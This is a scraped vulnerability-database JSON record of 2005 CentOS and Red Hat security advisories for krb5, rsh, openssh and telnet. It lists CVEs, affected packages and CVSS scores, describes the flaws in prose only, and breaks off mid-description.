{"lastseen": "2019-12-20T18:26:42", "references": ["http://iki.fi/upi/", "http://steadfast.net/", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B", "https://rhn.redhat.com/errata/RHSA-2005-562.html"], "scheme": null, "affectedPackage": [{"OS": "CentOS", "packageVersion": "1.2.7-47", "packageFilename": "krb5-workstation-1.2.7-47.s390x.rpm", "packageName": "krb5-workstation", "operator": "lt", "arch": "s390x", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.7-47", "packageFilename": "krb5-libs-1.2.7-47.i386.rpm", "packageName": "krb5-libs", "operator": "lt", "arch": "i386", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.7-47", "packageFilename": "krb5-libs-1.2.7-47.i386.rpm", "packageName": "krb5-libs", "operator": "lt", "arch": "i386", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.7-47", "packageFilename": "krb5-libs-1.2.7-47.x86_64.rpm", "packageName": "krb5-libs", "operator": "lt", "arch": "x86_64", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.7-47", "packageFilename": "krb5-devel-1.2.7-47.s390x.rpm", "packageName": "krb5-devel", "operator": "lt", "arch": "s390x", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.7-47", "packageFilename": "krb5-workstation-1.2.7-47.i386.rpm", "packageName": "krb5-workstation", "operator": "lt", "arch": "i386", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.7-47", "packageFilename": "krb5-1.2.7-47.src.rpm", "packageName": "krb5", "operator": "lt", "arch": "any", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.7-47", "packageFilename": "krb5-1.2.7-47.src.rpm", "packageName": "krb5", "operator": "lt", "arch": "any", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.7-47", "packageFilename": "krb5-server-1.2.7-47.s390.rpm", "packageName": "krb5-server", "operator": "lt", "arch": "s390", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.7-47", "packageFilename": "krb5-devel-1.2.7-47.s390.rpm", "packageName": "krb5-devel", "operator": "lt", "arch": "s390", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.7-47", "packageFilename": "krb5-server-1.2.7-47.s390x.rpm", "packageName": "krb5-server", "operator": "lt", "arch": "s390x", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.7-47", "packageFilename": "krb5-workstation-1.2.7-47.s390.rpm", "packageName": "krb5-workstation", "operator": "lt", "arch": "s390", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.7-47", "packageFilename": "krb5-libs-1.2.7-47.s390x.rpm", "packageName": "krb5-libs", "operator": "lt", "arch": "s390x", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.7-47", "packageFilename": "krb5-devel-1.2.7-47.i386.rpm", "packageName": "krb5-devel", "operator": "lt", "arch": "i386", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.7-47", "packageFilename": "krb5-server-1.2.7-47.i386.rpm", "packageName": "krb5-server", "operator": "lt", "arch": "i386", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.7-47", "packageFilename": "krb5-libs-1.2.7-47.s390.rpm", "packageName": "krb5-libs", "operator": "lt", "arch": "s390", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.7-47", "packageFilename": "krb5-devel-1.2.7-47.x86_64.rpm", "packageName": "krb5-devel", "operator": "lt", "arch": "x86_64", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.7-47", "packageFilename": "krb5-workstation-1.2.7-47.x86_64.rpm", "packageName": "krb5-workstation", "operator": "lt", "arch": "x86_64", "OSVersion": "3"}, {"OS": "CentOS", "packageVersion": "1.2.7-47", "packageFilename": "krb5-server-1.2.7-47.x86_64.rpm", "packageName": "krb5-server", "operator": "lt", "arch": "x86_64", "OSVersion": "3"}], "description": "**CentOS Errata and Security Advisory** CESA-2005:562\n\n\nKerberos is a networked authentication system which uses a trusted third\r\nparty (a KDC) to authenticate clients and servers to each other.\r\n\r\nA double-free flaw was found in the krb5_recvauth() routine which may be\r\ntriggered by a remote unauthenticated attacker. Although no exploit is\r\ncurrently known to exist, this issue could potentially be exploited to\r\nallow arbitrary code execution on a Key Distribution Center (KDC). The\r\nCommon Vulnerabilities and Exposures project assigned the name\r\nCAN-2005-1689 to this issue. \r\n\r\nDaniel Wachdorf discovered a single byte heap overflow in the\r\nkrb5_unparse_name() function, part of krb5-libs. Sucessful exploitation of\r\nthis flaw would lead to a denial of service (crash). To trigger this flaw\r\nan attacker would need to have control of a kerberos realm that shares a\r\ncross-realm key with the target, making exploitation of this flaw unlikely.\r\n(CAN-2005-1175). \r\n\r\nGa\u00ebl Delalleau discovered an information disclosure issue in the way\r\nsome telnet clients handle messages from a server. An attacker could\r\nconstruct a malicious telnet server that collects information from the\r\nenvironment of any victim who connects to it using the Kerberos-aware\r\ntelnet client (CAN-2005-0488).\r\n\r\nThe rcp protocol allows a server to instruct a client to write to arbitrary\r\nfiles outside of the current directory. This could potentially cause a\r\nsecurity issue if a user uses the Kerberos-aware rcp to copy files from a\r\nmalicious server (CAN-2004-0175). \r\n\r\nAll users of krb5 should update to these erratum packages which contain\r\nbackported patches to correct these issues. Red Hat would like to thank\r\nthe MIT Kerberos Development Team for their responsible disclosure of these\r\nissues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-July/023963.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-July/023964.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-July/023969.html\n\n**Affected packages:**\nkrb5\nkrb5-devel\nkrb5-libs\nkrb5-server\nkrb5-workstation\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2005-562.html", "edition": 4, "reporter": "CentOS Project", "published": "2005-07-12T23:06:13", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-1689", "CVE-2005-0488", "CVE-2005-1175", "CVE-2004-0175"]}, {"type": "nessus", "idList": ["FEDORA_2005-552.NASL", "DEBIAN_DSA-757.NASL", "CENTOS_RHSA-2005-567.NASL", "UBUNTU_USN-224-1.NASL", "FEDORA_2005-553.NASL", "CENTOS_RHSA-2005-562.NASL", "REDHAT-RHSA-2005-567.NASL", "REDHAT-RHSA-2005-562.NASL", "GENTOO_GLSA-200507-11.NASL", "MANDRAKE_MDKSA-2005-119.NASL"]}, {"type": "redhat", "idList": ["RHSA-2005:562", "RHSA-2005:165", "RHSA-2005:504", "RHSA-2005:106", "RHSA-2005:074", "RHSA-2005:481", "RHSA-2005:495", "RHSA-2005:567"]}, {"type": "centos", "idList": ["CESA-2005:567", "CESA-2005:106", "CESA-2005:504", "CESA-2005:481-01", "CESA-2005:495-01", "CESA-2005:165", "CESA-2005:504-00", "CESA-2005:562-01", "CESA-2005:074"]}, {"type": "gentoo", "idList": ["GLSA-200507-11"]}, {"type": "debian", "idList": ["DEBIAN:DSA-757-1:670FE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310855537", "OPENVAS:54373", "OPENVAS:830694", "OPENVAS:1361412562310855072", "OPENVAS:1361412562310855053", "OPENVAS:54987", "OPENVAS:1361412562310855256", "OPENVAS:855537", "OPENVAS:1361412562310830694", "OPENVAS:855053"]}, {"type": "ubuntu", "idList": ["USN-224-1"]}, {"type": "osvdb", "idList": ["OSVDB:17841", "OSVDB:17303", "OSVDB:17843", "OSVDB:9550"]}, {"type": "cert", "idList": ["VU:623332", "VU:800829", "VU:885830"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:9150", "SECURITYVULNS:DOC:8858", "SECURITYVULNS:DOC:9151"]}, {"type": "f5", "idList": ["F5:K4616", "SOL4616"]}, {"type": "suse", "idList": ["SUSE-SA:2004:009"]}], "modified": "2019-12-20T18:26:42", "rev": 2}, "score": {"value": 8.2, "vector": "NONE", "modified": "2019-12-20T18:26:42", "rev": 2}, "vulnersScore": 8.2}, "title": "krb5 security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2005-1689", "CVE-2005-0488", "CVE-2005-1175", "CVE-2004-0175"], "modified": "2005-07-14T18:12:54", "viewCount": 2, "href": "http://lists.centos.org/pipermail/centos-announce/2005-July/023963.html", "id": "CESA-2005:562", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}

{"centos": [{"lastseen": "2019-12-20T18:27:05", "bulletinFamily": "unix", "cvelist": ["CVE-2005-1689", "CVE-2005-0488", "CVE-2005-1175", "CVE-2004-0175"], "description": "**CentOS Errata and Security Advisory** CESA-2005:562-01\n\n\nKerberos is a networked authentication system which uses a trusted third\r\nparty (a KDC) to authenticate clients and servers to each other.\r\n\r\nA double-free flaw was found in the krb5_recvauth() routine which may be\r\ntriggered by a remote unauthenticated attacker. Although no exploit is\r\ncurrently known to exist, this issue could potentially be exploited to\r\nallow arbitrary code execution on a Key Distribution Center (KDC). The\r\nCommon Vulnerabilities and Exposures project assigned the name\r\nCAN-2005-1689 to this issue. \r\n\r\nDaniel Wachdorf discovered a single byte heap overflow in the\r\nkrb5_unparse_name() function, part of krb5-libs. Sucessful exploitation of\r\nthis flaw would lead to a denial of service (crash). To trigger this flaw\r\nan attacker would need to have control of a kerberos realm that shares a\r\ncross-realm key with the target, making exploitation of this flaw unlikely.\r\n(CAN-2005-1175). \r\n\r\nGa\u00ebl Delalleau discovered an information disclosure issue in the way\r\nsome telnet clients handle messages from a server. An attacker could\r\nconstruct a malicious telnet server that collects information from the\r\nenvironment of any victim who connects to it using the Kerberos-aware\r\ntelnet client (CAN-2005-0488).\r\n\r\nThe rcp protocol allows a server to instruct a client to write to arbitrary\r\nfiles outside of the current directory. This could potentially cause a\r\nsecurity issue if a user uses the Kerberos-aware rcp to copy files from a\r\nmalicious server (CAN-2004-0175). \r\n\r\nAll users of krb5 should update to these erratum packages which contain\r\nbackported patches to correct these issues. Red Hat would like to thank\r\nthe MIT Kerberos Development Team for their responsible disclosure of these\r\nissues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-July/023974.html\n\n**Affected packages:**\nkrb5-devel\nkrb5-libs\nkrb5-server\nkrb5-workstation\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "edition": 4, "modified": "2005-07-18T23:04:00", "published": "2005-07-18T23:04:00", "href": "http://lists.centos.org/pipermail/centos-announce/2005-July/023974.html", "id": "CESA-2005:562-01", "title": "krb5 security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-20T18:24:35", "bulletinFamily": "unix", "cvelist": ["CVE-2005-1689", "CVE-2005-1174", "CVE-2005-0488", "CVE-2005-1175", "CVE-2004-0175"], "description": "**CentOS Errata and Security Advisory** CESA-2005:567\n\n\nKerberos is a networked authentication system that uses a trusted third\r\nparty (a KDC) to authenticate clients and servers to each other.\r\n\r\nA double-free flaw was found in the krb5_recvauth() routine which may be\r\ntriggered by a remote unauthenticated attacker. Red Hat Enterprise Linux 4\r\ncontains checks within glibc that detect double-free flaws. Therefore, on\r\nRed Hat Enterprise Linux 4 successful exploitation of this issue can only\r\nlead to a denial of service (KDC crash). The Common Vulnerabilities and\r\nExposures project assigned the name CAN-2005-1689 to this issue.\r\n\r\nDaniel Wachdorf discovered a single byte heap overflow in the\r\nkrb5_unparse_name() function, part of krb5-libs. Sucessful exploitation of\r\nthis flaw would lead to a denial of service (crash). To trigger this flaw\r\nan attacker would need to have control of a kerberos realm that shares a\r\ncross-realm key with the target, making exploitation of this flaw unlikely.\r\n(CAN-2005-1175).\r\n\r\nDaniel Wachdorf also discovered that in error conditions that may occur in\r\nresponse to correctly-formatted client requests, the Kerberos 5 KDC may\r\nattempt to free uninitialized memory. This could allow a remote attacker\r\nto cause a denial of service (KDC crash) (CAN-2005-1174).\r\n\r\nGa\u00ebl Delalleau discovered an information disclosure issue in the way\r\nsome telnet clients handle messages from a server. An attacker could\r\nconstruct a malicious telnet server that collects information from the\r\nenvironment of any victim who connects to it using the Kerberos-aware\r\ntelnet client (CAN-2005-0488).\r\n\r\nThe rcp protocol allows a server to instruct a client to write to arbitrary\r\nfiles outside of the current directory. This could potentially cause a\r\nsecurity issue if a user uses the Kerberos-aware rcp to copy files from a\r\nmalicious server (CAN-2004-0175).\r\n\r\nAll users of krb5 should update to these erratum packages, which contain\r\nbackported patches to correct these issues. Red Hat would like to thank\r\nthe MIT Kerberos Development Team for their responsible disclosure of these\r\nissues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-July/023965.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-July/023966.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-July/023967.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-July/023968.html\n\n**Affected packages:**\nkrb5\nkrb5-devel\nkrb5-libs\nkrb5-server\nkrb5-workstation\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2005-562.html\nhttps://rhn.redhat.com/errata/RHSA-2005-567.html", "edition": 4, "modified": "2005-07-14T18:12:17", "published": "2005-07-13T00:28:39", "href": "http://lists.centos.org/pipermail/centos-announce/2005-July/023965.html", "id": "CESA-2005:567", "title": "krb5 security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-20T18:24:36", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0175"], "description": "**CentOS Errata and Security Advisory** CESA-2005:074\n\n\nThe rsh package contains a set of programs that allow users to run\ncommands on remote machines, login to other machines, and copy files\nbetween machines, using the rsh, rlogin, and rcp commands. All three of\nthese commands use rhosts-style authentication.\n\nThe rcp protocol allows a server to instruct a client to write to arbitrary\nfiles outside of the current directory. This could potentially cause a\nsecurity issue if a user uses rcp to copy files from a malicious server. \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CAN-2004-0175 to this issue.\n\nThese updated packages also address the following bugs:\n\nThe rexec command failed with \"Invalid Argument\", because the code\nused sigaction() as an unsupported signal.\n\nThe rlogind server reported \"SIGCHLD set to SIG_IGN but calls wait()\"\nmessage to the system log because the original BSD code was ported\nincorrectly to linux.\n\nThe rexecd server did not function on systems where client hostnames were\nnot in the DNS service, because server code called gethostbyaddr() for each\nnew connection.\n\nThe rcp command incorrectly used the \"errno\" variable and produced\nerroneous error messages.\n\nThe rexecd command ignored settings in the /etc/security/limits file,\nbecause the PAM session was incorrectly initialized.\n\nThe rexec command prompted for username and password regardless of the\n~/.netrc configuration file contents. This updated package contains a patch\nthat no longer skips the ~/.netrc file. \n\nAll users of rsh should upgrade to these updated packages, which resolve\nthese issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/023711.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/023717.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/023762.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/023763.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/023771.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/023772.html\n\n**Affected packages:**\nrsh\nrsh-server\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2005-074.html", "edition": 6, "modified": "2005-05-20T15:33:52", "published": "2005-05-18T17:58:16", "href": "http://lists.centos.org/pipermail/centos-announce/2005-May/023711.html", "id": "CESA-2005:074", "title": "rsh security update", "type": "centos", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-12-20T18:27:17", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0175"], "description": "**CentOS Errata and Security Advisory** CESA-2005:495-01\n\n\nThe rsh package contains a set of programs that allow users to run\r\ncommands on remote machines, login to other machines, and copy files\r\nbetween machines, using the rsh, rlogin, and rcp commands. All three of\r\nthese commands use rhosts-style authentication.\r\n\r\nThe rcp protocol allows a server to instruct a client to write to arbitrary\r\nfiles outside of the current directory. This could potentially cause a\r\nsecurity issue if a user uses rcp to copy files from a malicious server. \r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\r\nassigned the name CAN-2004-0175 to this issue.\r\n\r\nAll users of rsh should upgrade to these updated packages, which resolve\r\nthese issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-June/023891.html\n\n**Affected packages:**\nrsh\nrsh-server\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "edition": 5, "modified": "2005-06-13T22:49:37", "published": "2005-06-13T22:49:37", "href": "http://lists.centos.org/pipermail/centos-announce/2005-June/023891.html", "id": "CESA-2005:495-01", "title": "rsh security update", "type": "centos", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-12-20T18:29:15", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0175"], "description": "**CentOS Errata and Security Advisory** CESA-2005:481-01\n\n\nOpenSSH is OpenBSD's SSH (Secure SHell) protocol implementation. SSH\r\nreplaces rlogin and rsh, and provides secure encrypted communications\r\nbetween two untrusted hosts over an insecure network. X11 connections and\r\narbitrary TCP/IP ports can also be forwarded over a secure channel. Public\r\nkey authentication can be used for \"passwordless\" access to servers.\r\n\r\nThe scp protocol allows a server to instruct a client to write to arbitrary\r\nfiles outside of the current directory. This could potentially cause a\r\nsecurity issue if a user uses scp to copy files from a malicious server.\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\r\nassigned the name CAN-2004-0175 to this issue.\r\n\r\nThese updated packages also correct the following bug:\r\n\r\nOn systems in which direct ssh access for the root user was disabled by\r\nconfiguration (setting \"PermitRootLogin no\"), attempts to guess the root\r\npassword could be judged as sucessful or unsucessful by observing a delay.\r\n\r\nUsers of openssh should upgrade to these updated packages, which contain\r\nbackported patches to resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-June/023834.html\n\n**Affected packages:**\nopenssh\nopenssh-askpass\nopenssh-askpass-gnome\nopenssh-clients\nopenssh-server\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "edition": 5, "modified": "2005-06-05T22:53:04", "published": "2005-06-05T22:53:04", "href": "http://lists.centos.org/pipermail/centos-announce/2005-June/023834.html", "id": "CESA-2005:481-01", "title": "openssh security update", "type": "centos", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-12-20T18:25:47", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0175"], "description": "**CentOS Errata and Security Advisory** CESA-2005:165\n\n\nThe rsh package contains a set of programs that allow users to run\ncommands on remote machines, login to other machines, and copy files\nbetween machines, using the rsh, rlogin, and rcp commands. All three of\nthese commands use rhosts-style authentication.\n\nThe rcp protocol allows a server to instruct a client to write to arbitrary\nfiles outside of the current directory. This could potentially cause a\nsecurity issue if a user uses rcp to copy files from a malicious server.\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CAN-2004-0175 to this issue.\n\nThese updated packages also address the following bugs:\n\nThe rlogind server reported \"SIGCHLD set to SIG_IGN but calls wait()\"\nmessage to the system log because the original BSD code was ported\nincorrectly to linux.\n\nThe rexecd server did not function on systems where client hostnames were\nnot in the DNS service, because server code called gethostbyaddr() for each\nnew connection.\n\nThe rcp command incorrectly used the \"errno\" variable and produced\nerroneous error messages.\n\nThe rexecd command ignored settings in the /etc/security/limits file,\nbecause the PAM session was incorrectly initialized.\n\nAll users of rsh should upgrade to these updated packages, which resolve\nthese issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-June/023837.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-June/023839.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-June/023840.html\n\n**Affected packages:**\nrsh\nrsh-server\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2005-165.html", "edition": 4, "modified": "2005-06-08T23:28:58", "published": "2005-06-08T17:59:42", "href": "http://lists.centos.org/pipermail/centos-announce/2005-June/023837.html", "id": "CESA-2005:165", "title": "rsh security update", "type": "centos", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-12-20T18:25:39", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0175"], "description": "**CentOS Errata and Security Advisory** CESA-2005:106\n\n\nOpenSSH is OpenBSD's SSH (Secure SHell) protocol implementation. SSH\nreplaces rlogin and rsh, and provides secure encrypted communications\nbetween two untrusted hosts over an insecure network. X11 connections and\narbitrary TCP/IP ports can also be forwarded over a secure channel. Public\nkey authentication can be used for \"passwordless\" access to servers.\n\nThe scp protocol allows a server to instruct a client to write to arbitrary\nfiles outside of the current directory. This could potentially cause a\nsecurity issue if a user uses scp to copy files from a malicious server.\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CAN-2004-0175 to this issue.\n\nThese updated packages also correct the following bugs:\n\nOn systems where direct ssh access for the root user was disabled by\nconfiguration (setting \"PermitRootLogin no\"), attempts to guess the root\npassword could be judged as sucessful or unsucessful by observing a delay.\n\nOn systems where the privilege separation feature was turned on, the user\nresource limits were not correctly set if the configuration specified to\nraise them above the defaults. It was also not possible to change an\nexpired password.\n\nUsers of openssh should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/023712.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/023718.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/023760.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/023761.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/023769.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-May/023770.html\n\n**Affected packages:**\nopenssh\nopenssh-askpass\nopenssh-askpass-gnome\nopenssh-clients\nopenssh-server\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2005-106.html", "edition": 4, "modified": "2005-05-20T15:31:30", "published": "2005-05-18T18:00:09", "href": "http://lists.centos.org/pipermail/centos-announce/2005-May/023712.html", "id": "CESA-2005:106", "title": "openssh security update", "type": "centos", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-12-20T18:26:05", "bulletinFamily": "unix", "cvelist": ["CVE-2005-0488"], "description": "**CentOS Errata and Security Advisory** CESA-2005:504\n\n\nThe telnet package provides a command line telnet client. \r\n\r\nGael Delalleau discovered an information disclosure issue in the way the\r\ntelnet client handles messages from a server. An attacker could construct\r\na malicious telnet server that collects information from the environment of\r\nany victim who connects to it. The Common Vulnerabilities and Exposures\r\nproject (cve.mitre.org) has assigned the name CAN-2005-0488 to this issue.\r\n\r\nUsers of telnet should upgrade to this updated package, which contains a\r\nbackported patch to correct this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-June/023896.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-June/023898.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-June/023899.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-June/023902.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-June/023903.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-June/023905.html\nhttp://lists.centos.org/pipermail/centos-announce/2005-June/023907.html\n\n**Affected packages:**\ntelnet\ntelnet-server\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2005-504.html", "edition": 4, "modified": "2005-06-14T22:59:19", "published": "2005-06-14T20:30:21", "href": "http://lists.centos.org/pipermail/centos-announce/2005-June/023896.html", "id": "CESA-2005:504", "title": "telnet security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-12-20T18:26:43", "bulletinFamily": "unix", "cvelist": ["CVE-2005-0488"], "description": "**CentOS Errata and Security Advisory** CESA-2005:504-00\n\n\nThe telnet package provides a command line telnet client. \r\n\r\nGael Delalleau discovered an information disclosure issue in the way the\r\ntelnet client handles messages from a server. An attacker could construct\r\na malicious telnet server that collects information from the environment of\r\nany victim who connects to it. The Common Vulnerabilities and Exposures\r\nproject (cve.mitre.org) has assigned the name CAN-2005-0488 to this issue.\r\n\r\nUsers of telnet should upgrade to this updated package, which contains a\r\nbackported patch to correct this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2005-June/023909.html\n\n**Affected packages:**\ntelnet\ntelnet-server\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "edition": 4, "modified": "2005-06-14T23:05:19", "published": "2005-06-14T23:05:19", "href": "http://lists.centos.org/pipermail/centos-announce/2005-June/023909.html", "id": "CESA-2005:504-00", "title": "telnet security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "redhat": [{"lastseen": "2019-08-13T18:46:49", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0175", "CVE-2005-0488", "CVE-2005-1175", "CVE-2005-1689"], "description": "Kerberos is a networked authentication system which uses a trusted third\r\nparty (a KDC) to authenticate clients and servers to each other.\r\n\r\nA double-free flaw was found in the krb5_recvauth() routine which may be\r\ntriggered by a remote unauthenticated attacker. Although no exploit is\r\ncurrently known to exist, this issue could potentially be exploited to\r\nallow arbitrary code execution on a Key Distribution Center (KDC). The\r\nCommon Vulnerabilities and Exposures project assigned the name\r\nCAN-2005-1689 to this issue. \r\n\r\nDaniel Wachdorf discovered a single byte heap overflow in the\r\nkrb5_unparse_name() function, part of krb5-libs. Sucessful exploitation of\r\nthis flaw would lead to a denial of service (crash). To trigger this flaw\r\nan attacker would need to have control of a kerberos realm that shares a\r\ncross-realm key with the target, making exploitation of this flaw unlikely.\r\n(CAN-2005-1175). \r\n\r\nGa\u00ebl Delalleau discovered an information disclosure issue in the way\r\nsome telnet clients handle messages from a server. An attacker could\r\nconstruct a malicious telnet server that collects information from the\r\nenvironment of any victim who connects to it using the Kerberos-aware\r\ntelnet client (CAN-2005-0488).\r\n\r\nThe rcp protocol allows a server to instruct a client to write to arbitrary\r\nfiles outside of the current directory. This could potentially cause a\r\nsecurity issue if a user uses the Kerberos-aware rcp to copy files from a\r\nmalicious server (CAN-2004-0175). \r\n\r\nAll users of krb5 should update to these erratum packages which contain\r\nbackported patches to correct these issues. Red Hat would like to thank\r\nthe MIT Kerberos Development Team for their responsible disclosure of these\r\nissues.", "modified": "2019-03-22T23:43:22", "published": "2005-07-12T04:00:00", "id": "RHSA-2005:562", "href": "https://access.redhat.com/errata/RHSA-2005:562", "type": "redhat", "title": "(RHSA-2005:562) krb5 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:44:47", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0175", "CVE-2005-0488", "CVE-2005-1174", "CVE-2005-1175", "CVE-2005-1689"], "description": "Kerberos is a networked authentication system that uses a trusted third\r\nparty (a KDC) to authenticate clients and servers to each other.\r\n\r\nA double-free flaw was found in the krb5_recvauth() routine which may be\r\ntriggered by a remote unauthenticated attacker. Red Hat Enterprise Linux 4\r\ncontains checks within glibc that detect double-free flaws. Therefore, on\r\nRed Hat Enterprise Linux 4 successful exploitation of this issue can only\r\nlead to a denial of service (KDC crash). The Common Vulnerabilities and\r\nExposures project assigned the name CAN-2005-1689 to this issue.\r\n\r\nDaniel Wachdorf discovered a single byte heap overflow in the\r\nkrb5_unparse_name() function, part of krb5-libs. Sucessful exploitation of\r\nthis flaw would lead to a denial of service (crash). To trigger this flaw\r\nan attacker would need to have control of a kerberos realm that shares a\r\ncross-realm key with the target, making exploitation of this flaw unlikely.\r\n(CAN-2005-1175).\r\n\r\nDaniel Wachdorf also discovered that in error conditions that may occur in\r\nresponse to correctly-formatted client requests, the Kerberos 5 KDC may\r\nattempt to free uninitialized memory. This could allow a remote attacker\r\nto cause a denial of service (KDC crash) (CAN-2005-1174).\r\n\r\nGa\u00ebl Delalleau discovered an information disclosure issue in the way\r\nsome telnet clients handle messages from a server. An attacker could\r\nconstruct a malicious telnet server that collects information from the\r\nenvironment of any victim who connects to it using the Kerberos-aware\r\ntelnet client (CAN-2005-0488).\r\n\r\nThe rcp protocol allows a server to instruct a client to write to arbitrary\r\nfiles outside of the current directory. This could potentially cause a\r\nsecurity issue if a user uses the Kerberos-aware rcp to copy files from a\r\nmalicious server (CAN-2004-0175).\r\n\r\nAll users of krb5 should update to these erratum packages, which contain\r\nbackported patches to correct these issues. Red Hat would like to thank\r\nthe MIT Kerberos Development Team for their responsible disclosure of these\r\nissues.", "modified": "2017-09-08T11:51:21", "published": "2005-07-12T04:00:00", "id": "RHSA-2005:567", "href": "https://access.redhat.com/errata/RHSA-2005:567", "type": "redhat", "title": "(RHSA-2005:567) krb5 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:02", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0175"], "description": "The rsh package contains a set of programs that allow users to run\r\ncommands on remote machines, login to other machines, and copy files\r\nbetween machines, using the rsh, rlogin, and rcp commands. All three of\r\nthese commands use rhosts-style authentication.\r\n\r\nThe rcp protocol allows a server to instruct a client to write 